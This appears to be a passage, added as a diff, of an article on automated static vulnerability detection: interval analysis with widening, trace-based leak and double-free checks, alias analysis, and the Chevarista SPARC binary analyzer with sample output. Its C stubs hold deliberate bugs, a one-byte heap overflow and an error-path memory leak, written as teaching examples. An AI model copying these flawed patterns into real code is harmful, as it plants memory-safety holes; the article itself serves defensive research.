+bugs will be reported by the flow-sensitive analysis either (at least for this example).
+Additionally, computing the whole flow sensitive sets of intervals at some program point
+will grow exponentially in the number of data flow merging point (that is, Phi() function
+of the SSA form). 
+
+For this reason, the best approach seems to start with a completely flow insensitive, 
+and refine the analysis on demand. If the program is transforted into SSI form, then 
+it becomes pretty easy to know which source intervals we need to use to compute the 
+destination variable interval of values. We will use the same kind of analysis for 
+detecting buffer overflows, in that case the interval analysis will be used on the 
+index variables that are used for accessing memory at a certain offset from a given 
+base address.
+
+Before doing this, we might want to do a remark on the choice of an interval abstraction
+itself. This abstraction does not work well when bit swapping is involved into the 
+operations. Indeed, the intervals will generally have meaningless values when bits are
+moved inside the variable. If a cryptographic operation used bit shift that introduces 0 
+for replacing shifted bits, that would not be a a problem, but swapping bits inside a given 
+word is a problem, since the output interval is then meaningless.
+
+
+ ex:
+        c = a | b		(with A, B, and C integers)
+	c = a ^ b
+	c = not(c)
+
+
+Giving the interval of A and B, what can we deduce for the intervals of C ? Its less trivial
+than a simple numerical change in the variable. Interval analysis is not very well adapted
+for analyzing this kind of code, mostly found in cryptographic routines.
+
+We will now analyze an example that involves a buffer overflow on the heap. Before
+doing the interval analysis, we will do a first pass to inform us about the statement
+related to memory allocation and disallocation. Knowing where memory is allocated
+and disallocated is a pre-requirement for any further bound checking analysis.
+
+
+Stub 5					Interval analysis with alloc annotations
+------					----------------------------------------
+
+char *buf;				buf = _|_ (uninitialized)
+int   n = rand();			n   = [-Inf, +Inf]
+buf = malloc(n)				buf = initialized of size [-Inf to Inf]
+i   = 0;				i   = [0,0], [0,1] ... [0,N]
+
+while (i <= n)				      
+{		
+  assert(i < N)			    
+  buf[i] = 0x00;			
+  	
+  i++;					i   = [0,1], [0,2] ... [0,N]
+					     (iter1  iter2 ... iterN)
+}
+return (i);
+
+
+Lets first explain that the assert() is a logical representation in the intermediate
+form, and is not an assert() like in C program. Again, we never do any dynamic analysis
+but only static analysis without any execution. In the static analysis of the intermediate
+form program, a some point the control flow will reach a node containing the assert statement.
+In the intermediate (abstract) word, reaching an assert() means performing a check on the
+abstract value of the predicate inside the assert (i < N). In other words, the analyzer
+will check if the assert can be false using interval analysis of variables, and will print
+a bug report if it can. We can also let the assert() implicits, but representing them
+explicitely make the analysis more generic, modular, and adaptable to the user.
+
+As you can see, there is a one-byte-overflow in this example. It is pretty trivial
+to spot it manually, however we want to develop an automatic routine  for doing
+it. If we deploy the analysis that we have done in the previous example, the assert()
+that was automatically inserted by the analyzer after each memory access of the program 
+will fail after N iterations. This is because arrays in the C language start with index 0 and 
+finish with an index inferior of 1 to their allocated size. Whatever kind of 
+code will be inserted between those lines (except, of course, bit swapping as 
+previously mentioned), we will always be able to propagate the intervals and find
+that memory access are done beyond the allocated limit, then finding a clear
+memory leak or memory overwrite vulnerability in the program.
+
+However, this specific example brings 2 more questions:
+
+	- We do not know the actual value of N. Is it a problem ? If we 
+	manage to see that the constraint over the index of buf is actually
+	the same variable (or have the same value than) the size of the
+	allocated buffer, then it is not a problem. We will develop this in 
+	the alias analysis part of this article when this appears to be a
+	difficulty. 
+
+	- Whatever the value of N, and provided we managed to identify N
+	all definitions and use of the variable N, the analyzer will require N
+	iteration over the loop to detect the vulnerability. This is not
+	acceptable, especially if N is very big, which in that case many
+	minuts will be necessary for analysing this loop, when we actually
+	want an answer in the next seconds.
+
+The answer for this optimization problem is a technique called Widening, gathered
+from the theory of abstract interpretation. Instead of executing the loop N
+times until the loop condition is false, we will directly in 1 iteration go to
+the last possible value in a certain interval, and this as soon as we detect a
+monotonic increase of the interval. The previous example would then compute
+like in:
+
+Stub 5					Interval analysis with Widening
+------					-------------------------------
+
+char *buf;				buf = _|_ (uninitialized)
+int   n = rand();			n   = [-Inf, +Inf]
+buf = malloc(n)				buf = initialized of size [-Inf to Inf]
+i   = 0;				i = [0,0]
+
+while (i <= n)
+{
+  assert(i < N); 			    iter1  iter2 iter3 iter4  ASSERT!
+  buf[i] = 0x00;			i = [0,0], [0,1] [0,2] [0,N] 	
+  i++;					i = [0,1], [0,2] [0,3] [0,N] 
+}
+return (i);
+
+
+Using this test, we can directly go to the biggest possible interval in only 
+a few iterations, thus reducing drastically the requested time for finding
+the vulnerability. However this optimization might introduce additional
+difficulties when conditional statement is inside the loop:
+
+
+Stub 6					Interval analysis with Widening
+------					-------------------------------
+
+char *buf;				buf = _|_ (uninitialized)
+int   n = rand() + 2;			n   = [-Inf, +Inf]
+buf = malloc(n)				buf = initialized of size [-Inf to Inf]
+i   = 0;				i = [0,0]
+
+while (i <= n)				i = [0,0] [0,1] [0,2] [0,N] [0,N+1]
+{
+  if (i < n - 2)		        i = <same than previously for all iterations>
+  {
+    assert(i < N - 1)			[Never triggered !]
+    buf[i] = 0x00;  			i = [0,0] [0,1] [0,2] [0,N] <False positive>    
+  }			
+  i++;					i = [0,1] [0,2] [0,3] [0,N] [0,N+1]	
+}
+return (i);
+
+
+In this example, we cannot assume that the interval of i will be the same everywhere
+in the loop (as we might be tempted to do as a first hint for handling intervals in
+a loop). Indeed, in the middle of the loop stands a condition (with predicate being 
+i < n - 2) which forbids the interval to grow in some part of the code. This is problematic 
+especially if we decide to use widening until the loop breaking condition. We will miss
+this more subtle repartition of values in the variables of the loop. The solution for this
+is to use widening with thresholds. Instead of applying widening in a single time over the
+entire loop, we will define a sequel of values which corresponds to "strategic points" of
+the code, so that we can decide to increase precisely using a small-step values iteration.
+
+The strategic points can be the list of values on which a condition is applied. In our case
+we would apply widening until n = N - 2 and not until n = N. This way, we will not trigger
+a false positive anymore because of an overapproximation of the intervals over the entire
+loop. When each step is realized, that allows to annotate which program location is the subject
+of the widening in the future (in our case: the loop code before and after the "if" statement).
+
+Note that, when we reach a threshold during widening, we might need to apply a small-step
+iteration more than once before widening again until the next threshold. For instance, 
+when predicates such as (a != immed_value) are met, they will forbid the inner code of 
+the condition to have their interval propagated. However, they will forbid this just one 
+iteration (provided a is an inductive variable, so its state will change at next iteration) 
+or multiple iterations (if a is not an inductive variable and will be modified only at another 
+moment in the loop iterative abstract execution). In the first case, we need only 2 small-step
+abstract iterations to find out that the interval continues to grow after a certain iteration.
+In the second case, we will need multiple iteration until some condition inside the loop is
+reached. We then simply needs to make sure that the threshold list includes the variable value
+used at this predicate (which heads the code where the variable a will change). This way, we
+can apply only 2 small-step iterations between those "bounded widening" steps, and avoid
+generating false positives using a very optimized but precise abstract evaluation sequence.
+
+
+In our example, we took only an easy example: the threshold list is only made of 2 elements (n
+and (n - 2)). But what if a condition is realized using 2 variables and not a variable and 
+an immediate value ? in that case we have 3 cases:
+
+CASE1 - The 2 variables are inductive variables: in that case, the threshold list of the two variables 
+must be fused, so widening do not step over a condition that would make it lose precision. This
+seem to be a reasonable condition when one variable is the subject of a constraint that involve
+a constant and the second variable is the subject of a constraint that involve the first variable:
+
+
+Stub 7:						Threshold discovery
+-------						-------------------
+
+int a = MIN_LOWERBOUND;
+int b = MAX_UPPERBOUND;
+int i = 0;
+int n = MAXSIZE;
+
+while (i < n)					Found threshold n
+{
+  if (a < i < b)				Found predicate involving a and b
+    (...)
+  if (a > sizeof(something))			Found threshold for a
+    i = b;
+  else if (b + 1 < sizeof(buffer))		Found threshold for b
+    i = a;
+}
+
+
+In that case, we can define the threshold of this loop being a list of 2 values,
+one being sizeof(something), the other one being sizeof(buffer) or sizeof(buffer) - 1
+in case the analyzer is a bit more clever (and if the assembly code makes it clear
+that the condition applyes on sizeof(buffer) - 1).
+
+
+CASE2 - One of the variable is inductive and the other one is not. 
+
+
+So we have 2 subcases:
+
+ - The inductive variable is involved in a predicate that leads to modification
+   of the non-inductive variable. It is not possible without the 2 variables 
+   being inductives !Thus we fall into the case 1 again.
+
+
+ - The non-inductive variable is involved in a predicate that leads to
+   modification of the inductive variable. In that case, the non-inductive
+   variable would be invariant over the loop, which mean that a test between 
+   its domain of values (its interval) and the domain of the inductive
+   variable is required as a condition to enter the code stubs headed by the
+   analyzed predicate. Again, we have 2 sub-subcases:
+
+	* Either the predicate is a test == or !=. In that case, we must compute
+	the intesection of both variables intervals. If  the intersection is void,
+	the test will never true, so its dead code. If the intersection is itself
+	an interval (which will be the case most of the time), it means that the
+	test will be true over this inductive variable intervals of value, and 
+	false over the remaining domain of values. In that case, we need to put
+	the bounds of the non-inductive variable interval into the threshold list for 
+	the widening of inductive variables that depends on this non-inductive 
+	variable.
+	
+
+	* Or the predicate is a comparison : a < b (where a or b is an inductive
+	variable). Same remarks holds : we compute the intersection interval 
+	between a and b. If it is void, the test will always be true or false and
+	we know this before entering the loop. If the interval is not void, we 
+	need to put the bounds of the intersection interval in the widening threshold
+	of the inductive variable.
+
+
+CASE3 - None of the variables are inductive variables
+
+In that case, the predicate that they define has a single value over the
+entire loop, and can be computed before the loop takes place. We then can
+turn the conditional code into an unconditional one and apply widening
+like if the condition was not existing. Or if the condition is always
+false, we would simply remove this code from the loop as the content of
+the conditional statement will never be reached.
+
+As you can see, we need to be very careful in how we perform the widening. If
+the widening is done without thresholds, the abstract numerical values will
+be overapproximative, and our analysis will generate a lot of false positives.
+By introducing thresholds, we sacrify very few performance and gain a lot of 
+precision over the looping code analysis. Widening is a convergence accelerator
+for detecting problems like buffer overflow. Some overflow problem can happen
+after millions of loop iteration and widening brings a nice solution for
+getting immediate answers even on those constructs.
+
+I have not detailed how to find the size of buffers in this paragraph. Wether
+the buffers are stack or heap allocated, they need to have a fixed size at 
+some point and the stack pointer must be substracted somewhere (or malloc
+needs to be called, etc) which gives us the information of allocation 
+alltogether with its size, from which we can apply our analysis. 
+
+We will now switch to the last big part of this article, by explaining how
+to check for another class of vulnerability.
+
+
+
+
+------------[ B. Type state checking (aka double free, memory leaks, etc)
+
+
+
+There are some other types of vulnerabilities that are slightly different to
+check. In the previous part we explained how to reason about intervals of 
+values to find buffer overflows in program. We presented an optimization
+technique called Widening and we have studied how to weaken it for gaining
+precision, by generating a threshold list from a set of predicates. Note that
+we havent explicitely used what is called the "predicate abstraction", which
+may lead to improving the efficiency of the analysis again. The interested
+reader will for sure find resources about predicate abstraction on any good
+research oriented search engine. Again, this article is not intended to give
+all solutions of the problem of the world, but introduce the novice hacker
+to the concrete problematic of program analysis.
+
+In this part of the article, we will study how to detect memory leaks and
+heap corruptions. The basic technique to find them is not linked with interval
+analysis, but interval analysis can be used to make type state checking more
+accurate (reducing the number of false positives). 
+
+Lets take an example of memory leak to be concrete:
+
+
+Stub 8:
+-------
+
+1. u_int off  = 0;
+2. u_int ret  = MAXBUF;
+3. char  *buf = malloc(ret);
+
+4. do {
+5.     off += read(sock, buf + off, ret - off);
+6.     if (off == 0)
+7.       return (-ERR);
+8.     else if (ret == off)
+9.       buf = realloc(buf, ret * 2);
+10.} while (ret);
+
+11. printf("Received %s \n", buf);
+12. free(buf);
+13. return;
+
+
+
+In that case, there is no overflow but if some condition appears after the read, an error
+is returned without freeing the buffer. This is not a vulnerability as it, but it can
+help a lot for managing the memory layout of the heap while trying to exploit a heap
+overflow vulnerability. Thus, we are also interested in detecting memory leak that
+turns some particular exploits into powerful weapons.
+
+Using the graphical representation of control flow and data flow, we can easily
+find out that the code is wrong:
+
+
+Graph analysis of Stub 8
+------------------------
+
+
+	o A				A: Allocation
+	|				
+	|
+	o<----
+        |     \  
+        o      \
+       / \      \
+      /   \      \			R: Return
+   R o     o REA /			REA: Realloc
+      \   /     /
+       \ /     /
+        o     /
+        |    /
+        |   /
+        |  /
+        | /
+        |/
+        o
+        |				F: Free
+      F o
+        | 
+      R o				R: Return
+
+
+
+Note that this representation is not a data flow graph but a
+control-flow graph annotated with data allocation information for
+the BUF variable. This allows us to reason about existing control 
+paths and sequence of memory related events. Another way of doing 
+this would have been to reason about data dependences together with
+the predicates, as done in the first part of this article with the 
+Labelled SSI form. We are not dogmatic towards one or another 
+intermediate form, and the reader is invited to ponder by himself 
+which representation fits better to his understanding. I invite
+you to think twice about the SSI form which is really a condensed
+view of lots of different information. For pedagogical purpose, we
+switch here to a more intuitive intermediate form that express a 
+similar class of problems.
+
+
+Stub 8:
+-------
+
+
+0. #define PACKET_HEADER_SIZE 20
+
+1. int   off  = 0;
+2. u_int ret  = 10;
+3. char  *buf = malloc(ret);				M
+
+4. do {
+5.     off += read(sock, buf + off, ret - off);
+6.     if (off <= 0)
+7.       return (-ERR);					R
+8.     else if (ret == off)
+9.       buf = realloc(buf, (ret = ret * 2));		REA
+10.} while (off != PACKET_HEADER_SIZE);
+
+11. printf("Received %s \n", buf);
+12. free(buf);						F
+13. return;						R
+
+
+Using simple DFS (Depth-First Search) over the graph representing Stub 8, 
+we are capable of extracting sequences like:
+
+
+1,2,(3 M),4,5,6,8,10,11,(12 F),(12 R)		M...F...R	-noleak-
+
+1,2,(3 M),4,(5,6,8,10)*,11,(12 F),(12 R)	M(...)*F...R	-noleak-
+
+1,2,(3 M),4,5,6,8,10,5,6,(7 R)			M...R		-leak-
+
+1,2,(3 M),(4,5,6,8,10)*,5,6,(7 R)		M(...)*R	-leak-
+
+1,2,(3 M),4,5,6,8,(9 REA),10,5,6,(7 R)		M...REA...R	-leak-
+
+1,2,(3 M),4,5,6,(7 R)				M...R		-leak-
+
+etc
+
+More generally, we can represent the set of all possible traces for
+this example :
+
+
+		1,2,3,(5,6,(7 | 8(9 | Nop)) 10)*,(11,12,13)*
+
+
+with | meaning choice and * meaning potential looping over the events
+placed between (). As the program might loop more than once or twice,
+a lot of different traces are potentially vulnerable to the memory leak
+(not only the few we have given), but all can be expressed using this
+global generic regular expression over events of the loop, with respect
+to this regular expression:
+
+
+			.*(M)[^F]*(R)
+
+
+that represent traces containing a malloc followed by a return without 
+an intermediate free, which corresponds in our program to:
+
+
+			.*(3)[^12]*(7)
+
+		  =	.*(3).*(7)	 # because 12 is not between 3 and 7 in any cycle
+
+
+In other words, if we can extract a trace that leads to a return after passing
+by an allocation not followed by a free (with an undetermined number of states
+between those 2 steps), we found a memory leak bug.
+
+We can then compute the intersection of the global regular expression trace
+and the vulnerable traces regular expression to extract all potential 
+vulnerable path from a language of traces. In practice, we will not generate
+all vulnerable traces but simply emit a few of them, until we find one that
+we can indeed trigger. 
+
+Clearly, the first two trace have a void intersection (they dont contain 7). So
+those traces are not vulnerable. However, the next traces expressions match
+the pattern, thus are potential vulnerable paths for this vulnerability.
+
+We could use the exact same system for detecting double free, except that
+our trace pattern would be :
+
+			
+			.*(F)[^A]*(F)
+
+
+that is : a free followed by a second free on the same dataflow, not passing
+through an allocation between those. A simple trace-based analyzer can detect
+many cases of vulnerabilities using a single engine ! That superclass of 
+vulnerability is made of so called type-state vulnerabilities, following the idea that
+if the type of a variable does not change during the program, its state does,
+thus the standard type checking approach is not sufficient to detect this kind of 
+vulnerabilities.
+		
+
+As the careful reader might have noticed, this algorithm does not take predicates
+in account, which means that if such a vulnerable trace is emitted, we have no 
+garantee if the real conditions of the program will ever execute it. Indeed, we 
+might extract a path of the program that "cross" on multiple predicates, some
+being incompatible with others, thus generating infeasible paths using our
+technique.
+
+For example in our Stub 8 translated to assembly code, a predicate-insensitive 
+analysis might generate the trace:
+
+		1,2,3,4,5,6,8,9,10,11,12,13
+
+which is impossible to execute because predicates holding at states 8 and 10 
+cannot be respectively true and false after just one iteration of the loop. Thus 
+such a trace cannot exist in the real world. 
+ 
+
+We will not go further this topic for this article, but in the next part, we will
+discuss various improvements of what should be a good analysis engine to avoid
+generating too much false positives.
+
+
+
+------------[ C. How to improve
+
+
+	In this part, we will review various methods quickly to determine how exactly
+it is possible to make the analysis more accurate and efficient. Current researchers
+in program analysis used to call this a "counter-example guided" verification. Various
+techniques taken from the world of Model Checking or Abstract Interpretation can then
+be used, but we will not enter such theoretical concerns. Simply, we will discuss the
+ideas of those techniques without entering details. The proposed chevarista analyzer
+in appendix of this article only perform basic alias analysis, no predicate analysis,
+and no thread scheduling analysis (as would be useful for detecting race conditions).
+I will give the name of few analyzer that implement this analysis and quote which
+techniques they are using.
+
+
+----------------------[ a. Predicate analysis and the predicate lattice
+
+
+Predicate abstraction [PA] is about collecting all the predicates in a program, and
+constructing a mathematic object from this list called a lattice [LAT]. A lattice is
+a set of objects on which a certain (partial) order is defined between elements
+of this set. A lattice has various theoretical properties that makes it different
+than a partial order, but we will not give such details in this article. We will
+discuss about the order itself and the types of objects we are talking about:
+
+	- The order can be defined as the union of objects 
+
+				(P < Q iif P is included in Q)
+
+	- The objects can be predicates
+
+
+	- The conjunction (AND) of predicate can be the least upper bound of N
+	predicates. Predicates (a > 42) and (b < 2) have as upper bound:
+
+				(a > 42) && (b < 2)
+
+	- The disjunction (OR) of predicates can be the greatest lower bound of
+	N predicates. Predicates (a > 42) and (b < 2) would have as lower
+	bound:
+
+				(a > 42) || (b < 2)
+
+	So the lattice would look like:
+
+
+				(a > 42) && (b < 2)
+					/  \
+				       /    \
+				      /      \
+				(a > 42)     (b < 2)
+				      \      /
+                                       \    /
+                                        \  /
+	                        (a > 42) || (b < 2)
+
+
+Now imagine we have a program that have N predicates. If all predicates
+can be true at the same time, the number of combinations between predicates
+will be 2 at the power of N. THis is without counting the lattice elements
+which are disjunctions between predicates. The total number of combinations 
+will then be then 2*2pow(N) - N : We have to substract N because the predicates
+made of a single atomic predicates are shared between the set of conjunctives
+and the set of disjunctive predicates, which both have 2pow(N) number of 
+elements including the atomic predicates, which is the base case for a conjunction
+(pred && true) or a disjunction (pred || false). 
+
+We may also need to consider the other values of predicates : false, and unknown.
+False would simply be the negation of a predicate, and unknown would inform about
+the unknown truth value for a predicate (either false or true, but we dont know).
+In that case, the number of possible combinations between predicates is to count
+on the number of possible combinations of N predicates, each of them being potentially
+true, false, or unknown. That makes up to 3pow(N) possibilities. This approach is called
+three-valued logic [TVLA].
+
+In other words, we have a exponential worse case space complexity for constructing 
+the lattice of predicates that correspond to an analyzed program. Very often, the 
+lattice will be smaller, as many predicates cannot be true at the same time. However, 
+there is a big limitation in such a lattice: it is not capable to analyze predicates 
+that mix AND and OR. It means that if we analyze a program that can be reached using 
+many different set of predicates (say, by executing many different possible paths, 
+which is the case for reusable functions), this lattice will not be capable to give 
+the most precise "full" abstract representation for it, as it may introduce some 
+flow-insensitivity in the analysis (e.g. a single predicate combinations will represent 
+multiple different paths). As this might generate false positives, it looks like a good 
+trade-off between precision and complexity. Of course, this lattice is just provided as 
+an example and the reader should feel free to adapt it to its precise needs and depending 
+on the size of the code to be verified. It is a good hint for a given abstraction
+but we will see that other information than predicates are important for program
+analysis.
+
+
+	
+---------------------[ b. Alias analysis is hard
+
+
+	A problem that arises in both source code but even more in binary code
+automated auditing is the alias analysis between pointers. When do pointers
+points on the same variables ? This is important in order to propagate the
+infered allocation size (when talking about a buffer), and to share a 
+type-state (such as when a pointer is freed or allocated : you could miss 
+double free or double-something bugs if you dont know that 2 variables are 
+actually the same).
+
+There are multiple techniques to achieve alias analysis. Some of them works
+inside a single function (so-called intraprocedural [DDA]). Other works across
+the boundaries of a function. Generally, the more precise is your alias
+analysis, the smaller program you will be capable to analyze. It seems
+quite difficult to scale to millions of lines of code if tracking every
+single location for all possible pointers in a naive way. In addition
+to the problem that each variable might have a very big amount of aliases
+(especially when involving aliases over arrays), a program translated to
+a single-assignment or single-information form has a very big amount of
+variables too. However the live range of those variables is very limited,
+so their number of aliases too. It is necessary to define aliasing relations
+between variables so that we can proceed our analysis using some extra checks:
+
+	- no_alias(a,b)   : Pointers a and b definitely points on different sets
+			   of variables
+
+	- must_alias(a,b) : Pointers a and b definitely points on the same set
+			   of variables
+
+	- may_alias(a,b)  : The "point-to" sets for variables a and b share some
+			    elements (non-null intersection) but are not equal.
+
+NoAliasing and MustAliasing are quite intuitive. The big job is definitely
+the MayAliasing. For instance, 2 pointers might point on the same variable
+when executing some program path, but on different variables when executing
+from another path. An analysis that is capable to make those differences is
+called a path-sensitive analysis. Also, for a single program location manipulating
+a given variable, the point-to set of the variable can be different depending
+on the context (for example : the set of predicates that are true at this moment 
+of abstract program interpretation). An analysis that can reason on those
+differences is called context-sensitive.
+
+Its an open problem in research to find better alias analysis algorithms that scale
+to big programs (e.g. few computation cost) and that are capable to keep
+sufficiently precision to prove security properties. Generally, you can have one,
+but not the other. Some analysis are very precise but only works in the boundaries
+of a function. Others work in a pure flow-insensitive manner, thus scale to big
+programs but are very imprecise. My example analyzer Chevarista implements only
+a simple alias analysis, that is very precise but does not scale well to big
+programs. For each pointer, it will try to compute its point-to set in the concrete
+world by somewhat simulating the computation of pointer arithmetics and looking at 
+its results from within the analyzer. It is just provided as an example but is
+in no way a definitive answer to this problem.
+
+
+
+--------------------[ c. Hints on detecting race conditions
+
+
+	Another class of vulnerability that we are interested to detect
+automatically are race conditions. Those vulnerability requires a different
+analysis to be discovered, as they relates to a scheduling property : is
+it possible that 2 thread get interleaved (a,b,a,b) executions over their
+critical sections where they share some variables ? If the variables are
+all well locked, interleaved execution wont be a problem anyway. But if 
+locking is badly handled (as it can happens in very big programs such
+as Operating Systems), then a scheduling analysis might uncover the 
+problem.
+
+Which data structure can we use to perform such analysis ? The approach
+of JavaPathFinder [JPF] that is developed at NASA is to use a scheduling graph.
+The scheduling graph is a non-cyclic (without loop) graph, where nodes
+represents states of the program and and edges represents scheduling
+events that preempt the execution of one thread for executing another.
+
+As this approach seems interesting to detect any potential scheduling
+path (using again a Depth First Search over the scheduling graph) that
+fails to lock properly a variable that is used in multiple different
+threads, it seems to be more delicate to apply it when we deal with
+more than 2 threads. Each potential node will have as much edges as
+there are threads, thus the scheduling graph will grow exponentially
+at each scheduling step. We could use a technique called partial
+order reduction to represent by a single node a big piece of code
+for which all instructions share the same scheduling property (like:
+it cannot be interrupted) or a same dataflow property (like: it uses
+the same set of variables) thus reducing the scheduling graph to make
+it more abstract.
+
+Again, the chevarista analyzer does not deal with race conditions, but
+other analyzers do and techniques exist to make it possible. Consider
+reading the references for more about this topic.
+
+
+
+
+-----------[ IV. Chevarista: an analyzer of binary programs
+
+	
+   Chevarista is a project for analyzing binary code. In this article, most of
+   the examples have been given in C or assembly, but Chevarista only analyze
+   the binary code without any information from the source. Everything it
+   needs is an entry point to start the analysis, which you can always get
+   without troubles, for any (working ? ;) binary format like ELF, PE, etc.
+
+   Chevarista is a simplier analyzer than everything that was presented in
+   this article, however it aims at following this model, driven by the succesful
+   results that were obtained using the current tool. In particular, the
+   intermediate form of Chevarista at the moment is a graph that contains
+   both data-flow and control-flow information, but with sigma and phi 
+   functions let implicit.
+
+   For simplicity, we have chosen to work on SPARC [SRM] binary code, but after
+   reading that article, you might understand that the representations
+   used are sufficiently abstract to be used on any architecture. One could
+   argue that SPARC instruction set is RISC, and supporting CISC architecture 
+   like INTEL or ARM where most of the instruction are conditional, would be
+   a problem. You are right to object on this because  these architectures
+   requires specific features of the architecture-dependant backend of
+   the decompiler-analyzer. Currently, only the SPARc backend is coded and there 
+   is an empty skeleton for the INTEL architecture [IRM].
+
+   What are, in the detail, the difference between such architectures ?
+
+   They are essentially grouped into a single architecture-dependant component :
+	
+				The Backend
+
+   On INTEL 32bits processors, each instruction can perform multiple operations. 
+   It is also the case for SPARC, but only when conditional flags are affected 
+   by the result of the operation executed by the instruction. For instance,
+   a push instruction write in memory, modify the stack pointer, and potentially
+   modify the status flags (eflags register on INTEL), which make it very hard to
+   analyze. Many instructions do more than a single operation, thus we need to
+   translate into intermediate forms that make those operations more explicit. If
+   we limit the number of syntactic constructs in that intermediate form, we are
+   capable of performing architecture independant analysis much easier with
+   all operations made explicit. The low-level intermediate form of Chevarista
+   has around 10 "abstract operations" in its IR : Branch, Call, Ternop (that
+   has an additional field in the structure indicating which arithmetic or 
+   logic operation is performed), Cmp, Ret, Test, Interrupt, and Stop. Additionally
+   you have purely abstract operations (FMI: Flag Modifying Instruction), CFI
+   (Control Flow Instruction), and Invoke (external functions calls) which allow to 
+   make the analysis further even more generic. Invoke is a kind of statement that
+   inform the analyzer that it should not try to analyze inside the function being
+   invoked, but consider those internals as an abstraction. For instance, types
+   Alloc, Free, Close are child classes of the Invoke abstract class, which model
+   the fact that malloc(), free(), or close() are called and the analyzer should
+   not try to handle the called code, but consider it as a blackbox. Indeed, finding
+   allocation bugs does not require to go analyzing inside malloc() or free(). This
+   would be necessary for automated exploit generation tho, but we do not cover this
+   here.
+
+
+   We make use the Visitor Design Pattern for architecturing the analysis, as presented 
+   in the following paragraph.
+   
+
+
+--------------------[ B. Program transformation & modeling
+
+
+
+	The project is organized using the Visitor Design Pattern [DP]. To sum-up,
+  the Visitor Design Pattern allows to walk on a graph (that is: the intermediate
+  form representation inside the analyzer) and transform the nodes (that contains
+  either basic blocs for control flow analysis, or operands for dataflow analysis:
+  indeed the control or data flow links in the graph represents the ancestors /
+  successors relations between (control flow) blocs or (data flow) variables.
+
+
+  The project is furnished as it:
+
+
+  visitor: The default visitor. When the graph contains node which
+  type are not handled by the current visitor, its this visitor that
+  perform the operation. THe default visitor is the root class of 
+  the Visitor classes hierarchy.
+
+  arch	      : the architecture backend. Currently SPARC32/64 is fully
+	      provided and the INTEL backend is just a skeleton. The
+	      whole proof of concept was written on SPARC for simplicity. This
+	      part also includes the generic code for dataflow and control flow 
+	      computations.
+
+  graph	      : It contains all the API for constructing graphs directly into
+	      into the intermediate language. It also defines all the abstract
+	      instructions (and the "more" abstract instruction as presented
+	      previously)
+
+  gate	      : This is the interprocedural analysis visitor. Dataflow and
+	      Control flow links are propagated interprocedurally in that visitor. 
+	      Additionally, a new type "Continuation" abstracts different kind of 
+	      control transfer (Branch, Call, Ret, etc) which make the analysis even
+	      easier to perform after this transformation.
+
+  alias	      : Perform a basic point-to analysis to determine obvious aliases 
+	      between variables before checking for vulnerabilities. THis analysis is 
+	      exact and thus does not scale to big programs. There are many hours of
+	      good reading and hacking to improve this visitor that would make the whole
+	      analyzer much more interesting in practice on big programs.
+
+  heap	      : This visitor does not perform a real transformation, but simplistic graph 
+	      walking to detect anomalies on the data flow graph. Double frees, Memory
+	      leaks, and such, are implemented in that Visitor.
+
+  print	      : The Print Visitor, simply prints the intermediate forms after each
+	      transformation in a text file.
+
+  printdot    : Print in a visual manner (dot/graphviz) the internal representation. This
+	      can also be called after each transformation but we currently calls it 
+	      just at this end of the analysis.
+
+
+Additionally, another transformation have been started but is still work in progress:
+
+
+
+ symbolic     : Perform translation towards a more symbolic intermediate forms (such as
+	      SSA and SSI) and  (fails to) structure the control flow graphs into a graph 
+	      of zones. This visitor is work in progress but it is made part of this 
+	      release as Chevarista will be discontinued in its current work, for being
+	      implemented in the ERESI [RSI] language instead of C++.
+
+
+
+	      ---------------      -----------      -----------      ----------   
+	     |               |    |           |    |           |    |          |
+   RAW       | Architecture  |    |   Gate    |    |   Alias   |    |   Heap   |
+       ----> |               | -> |           | -> |           | -> |          | -> Results
+   ASM       |   Backend     |    |  Visitor  |    |  Visitor  |    |  Visitor |
+             |               |    |           |    |           |    |          |
+              ---------------      -----------      -----------      ----------
+
+
+
+--------------------[ C. Vulnerability checking
+
+
+   
+   Chevarista is used as follow in this demo framework. A certain big testsuits of binary
+   files is provided in the package and the analysis is performed. In only a couple of
+   seconds, all the analysis is finished:
+
+   
+   # We execute chevarista on testsuite binary 34
+
+   $ autonomous/chevarista ../testsuite/34.elf
+   
+                  .:/\  Chevarista standalone version /\:.  
+			
+   [...]
+
+   => chevarista 
+Detected SPARC
+Chevarista IS STARTING
+Calling sparc64_IDG
+Created IDG
+SPARC IDG : New bloc at addr 0000000000100A34 
+SPARC IDG : New bloc at addr 00000000002010A0 
+[!] Reached Invoke at addr 00000000002010A4 
+SPARC IDG : New bloc at addr 0000000000100A44 
+Cflow reference to : 00100A50 
+Cflow reference from : 00100A48 
+Cflow reference from : 00100C20 
+SPARC IDG : New bloc at addr 0000000000100A4C 
+SPARC IDG : New bloc at addr 0000000000100A58 
+SPARC IDG : New bloc at addr 0000000000201080 
+[!] Reached Invoke at addr 0000000000201084 
+SPARC IDG : New bloc at addr 0000000000100A80 
+SPARC IDG : New bloc at addr 0000000000100AA4 
+SPARC IDG : New bloc at addr 0000000000100AD0 
+SPARC IDG : New bloc at addr 0000000000100AF4 
+SPARC IDG : New bloc at addr 0000000000100B10 
+SPARC IDG : New bloc at addr 0000000000100B70 
+SPARC IDG : New bloc at addr 0000000000100954 
+Cflow reference to : 00100970 
+Cflow reference from : 00100968 
+Cflow reference from : 00100A1C 
+SPARC IDG : New bloc at addr 000000000010096C 
+SPARC IDG : New bloc at addr 0000000000100A24 
+Cflow reference to : 00100A2C 
+Cflow reference from : 00100A24 
+Cflow reference from : 00100A08 
+SPARC IDG : New bloc at addr 0000000000100A28 
+SPARC IDG : New bloc at addr 0000000000100980 
+SPARC IDG : New bloc at addr 0000000000100A10 
+SPARC IDG : New bloc at addr 00000000001009C4 
+SPARC IDG : New bloc at addr 0000000000100B88 
+SPARC IDG : New bloc at addr 0000000000100BA8 
+SPARC IDG : New bloc at addr 0000000000100BC0 
+SPARC IDG : New bloc at addr 0000000000100BE0 
+SPARC IDG : New bloc at addr 0000000000100BF8 
+SPARC IDG : New bloc at addr 0000000000100C14 
+SPARC IDG : New bloc at addr 00000000002010C0 
+[!] Reached Invoke at addr 00000000002010C4 
+SPARC IDG : New bloc at addr 0000000000100C20 
+SPARC IDG : New bloc at addr 0000000000100C04 
+SPARC IDG : New bloc at addr 0000000000100910 
+SPARC IDG : New bloc at addr 0000000000201100 
+[!] Reached Invoke at addr 0000000000201104 
+SPARC IDG : New bloc at addr 0000000000100928 
+SPARC IDG : New bloc at addr 000000000010093C 
+SPARC IDG : New bloc at addr 0000000000100BCC 
+SPARC IDG : New bloc at addr 00000000001008E0 
+SPARC IDG : New bloc at addr 00000000001008F4 
+SPARC IDG : New bloc at addr 0000000000100900 
